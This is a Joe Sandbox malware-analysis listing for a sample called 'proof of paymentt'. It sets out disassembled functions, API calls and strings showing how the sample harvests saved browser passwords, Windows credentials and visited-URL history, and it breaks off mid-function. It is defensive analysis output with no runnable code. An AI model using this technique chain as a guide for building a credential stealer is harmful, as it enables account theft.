Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514

SetErrorMode.KERNELBASE(00008001), ref: 00412799
GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9

Strings

/savelangfile, xrefs: 00412805
, xrefs: 004127CD
/deleteregkey, xrefs: 00412833

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
String ID: $/deleteregkey$/savelangfile
API String ID: 2744995895-28296030
Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040B71C

Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D

wcsrchr.MSVCRT ref: 0040B738
memset.MSVCRT ref: 0040B756
memset.MSVCRT ref: 0040B7F5
CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
CopyFileW.KERNELBASE(00445FAE,?,00000000,?,?), ref: 0040B82D
FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
memset.MSVCRT ref: 0040B851
memset.MSVCRT ref: 0040B8CA
memcmp.MSVCRT ref: 0040B9BF

Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
memset.MSVCRT ref: 0040BB53
memcpy.MSVCRT ref: 0040BB66
LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D

Strings

v10, xrefs: 0040B9B7
chp, xrefs: 0040B817

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
String ID: chp$v10
API String ID: 580435826-2783969131
Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

Uniqueness

Uniqueness Score: -1.00%

Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004091E2

Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF

memcpy.MSVCRT ref: 004092C9
memcmp.MSVCRT ref: 004092D9
memcpy.MSVCRT ref: 0040930C
memcpy.MSVCRT ref: 00409325
memcmp.MSVCRT ref: 0040933B
memcpy.MSVCRT ref: 00409357
memcpy.MSVCRT ref: 00409370
memcmp.MSVCRT ref: 00409411
memcmp.MSVCRT ref: 00409429
memcpy.MSVCRT ref: 00409462
memcpy.MSVCRT ref: 0040947E
memcpy.MSVCRT ref: 0040949A
memcmp.MSVCRT ref: 004094AC
memcpy.MSVCRT ref: 004094D0
memcpy.MSVCRT ref: 004094E8

Strings

, xrefs: 0040929F

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memcpy$memcmp$ByteCharMultiWidememset
String ID:
API String ID: 3715365532-3916222277
Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

Uniqueness

Uniqueness Score: -1.00%

Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142
processlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
memset.MSVCRT ref: 00413D7F
Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
memset.MSVCRT ref: 00413E07
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
??3@YAXPAX@Z.MSVCRT ref: 00413EC1
Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
FindCloseChangeNotification.KERNELBASE(00000000,00000000,0000022C), ref: 00413F1A

Strings

QueryFullProcessImageNameW, xrefs: 00413E46
kernel32.dll, xrefs: 00413E37

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??3@CloseHandleProcess32memset$AddressChangeCreateFindFirstModuleNextNotificationOpenProcProcessSnapshotToolhelp32
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 2191996607-1740548384
Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4

Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85

Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE

CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
CloseHandle.KERNEL32(00000000), ref: 0040E143
CloseHandle.KERNEL32(?), ref: 0040E148
CloseHandle.KERNEL32(?), ref: 0040E14D

Strings

bhv, xrefs: 0040E0DD

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
String ID: bhv
API String ID: 327780389-2689659898
Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F

Strings

EnumProcessModules, xrefs: 00413F71
GetModuleFileNameExW, xrefs: 00413F7D
EnumProcesses, xrefs: 00413F89
psapi.dll, xrefs: 00413F55
GetModuleInformation, xrefs: 00413F95
GetModuleBaseNameW, xrefs: 00413F65

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2941347001-70141382
Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

Uniqueness

Uniqueness Score: -1.00%

Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
__set_app_type.MSVCRT ref: 00446762
__p__fmode.MSVCRT ref: 00446777
__p__commode.MSVCRT ref: 00446785
__setusermatherr.MSVCRT ref: 004467B1
_initterm.MSVCRT ref: 004467C7
__wgetmainargs.KERNELBASE ref: 004467EA
_initterm.MSVCRT ref: 004467FD
GetStartupInfoW.KERNEL32(?), ref: 0044685A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
exit.KERNELBASE ref: 00446897
_cexit.MSVCRT ref: 0044689D

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040C298

Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
wcschr.MSVCRT ref: 0040C324
wcschr.MSVCRT ref: 0040C344
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
GetLastError.KERNEL32 ref: 0040C373
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
FindCloseUrlCache.WININET(?), ref: 0040C3B0

Strings

visited:, xrefs: 0040C308

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
String ID: visited:
API String ID: 1157525455-1702587658
Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1

memset.MSVCRT ref: 0040E1BD

Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B

??3@YAXPAX@Z.MSVCRT ref: 0040E28B

Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69

Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20

_snwprintf.MSVCRT ref: 0040E257

Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F

Strings

Containers, xrefs: 0040E195
ContainerId, xrefs: 0040E1FC
Name, xrefs: 0040E209
Container_%I64d, xrefs: 0040E246
, xrefs: 0040E1D8

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
String ID: $ContainerId$Container_%I64d$Containers$Name
API String ID: 3883404497-2982631422
Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98

Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A

memset.MSVCRT ref: 0040BC75
memset.MSVCRT ref: 0040BC8C
WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
memcmp.MSVCRT ref: 0040BCD6
memcpy.MSVCRT ref: 0040BD2B
LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D

Strings

, xrefs: 0040BD19

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
String ID:
API String ID: 509814883-3916222277
Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Uniqueness

Uniqueness Score: -1.00%

Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
GetLastError.KERNEL32 ref: 0041847E
??3@YAXPAX@Z.MSVCRT ref: 0041848B

Strings

|A, xrefs: 00418462

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: CreateFile$??3@ErrorLast
String ID: |A
API String ID: 1407640353-1717621600
Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

Uniqueness

Uniqueness Score: -1.00%

Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0041249C
??2@YAPAXI@Z.MSVCRT ref: 004124D2
??2@YAPAXI@Z.MSVCRT ref: 00412510
GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
LoadIconW.USER32(00000000,00000065), ref: 0041258B
wcscpy.MSVCRT ref: 004125A0

Strings

r!A, xrefs: 00412477

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??2@$HandleIconLoadModulememsetwcscpy
String ID: r!A
API String ID: 2791114272-628097481
Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

Uniqueness

Uniqueness Score: -1.00%

Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6

Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B

Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373

Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB

_wcslwr.MSVCRT ref: 0040C817

Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF

wcslen.MSVCRT ref: 0040C82C

Strings

http://www.facebook.com/, xrefs: 0040C7B7
https://www.google.com/accounts/servicelogin, xrefs: 0040C7AA
/, xrefs: 0040C838
/, xrefs: 0040C843
https://login.yahoo.com/config/login, xrefs: 0040C7C4

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
API String ID: 62308376-4196376884
Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
LockResource.KERNEL32(00000000), ref: 0040B5DD
memcpy.MSVCRT ref: 0040B60D

Strings

BIN, xrefs: 0040B5AB

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
String ID: BIN
API String ID: 1668488027-1015027815
Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

Uniqueness

Uniqueness Score: -1.00%

Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7

CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
wcslen.MSVCRT ref: 0040BE06
_wcsncoll.MSVCRT ref: 0040BE38
memset.MSVCRT ref: 0040BE91
memcpy.MSVCRT ref: 0040BEB2
_wcsnicmp.MSVCRT ref: 0040BEFC
wcschr.MSVCRT ref: 0040BF24
LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
String ID:
API String ID: 3191383707-0
Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69

Uniqueness

Uniqueness Score: -1.00%

Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403CBF
memset.MSVCRT ref: 00403CD4
memset.MSVCRT ref: 00403CE9
memset.MSVCRT ref: 00403CFE
memset.MSVCRT ref: 00403D13

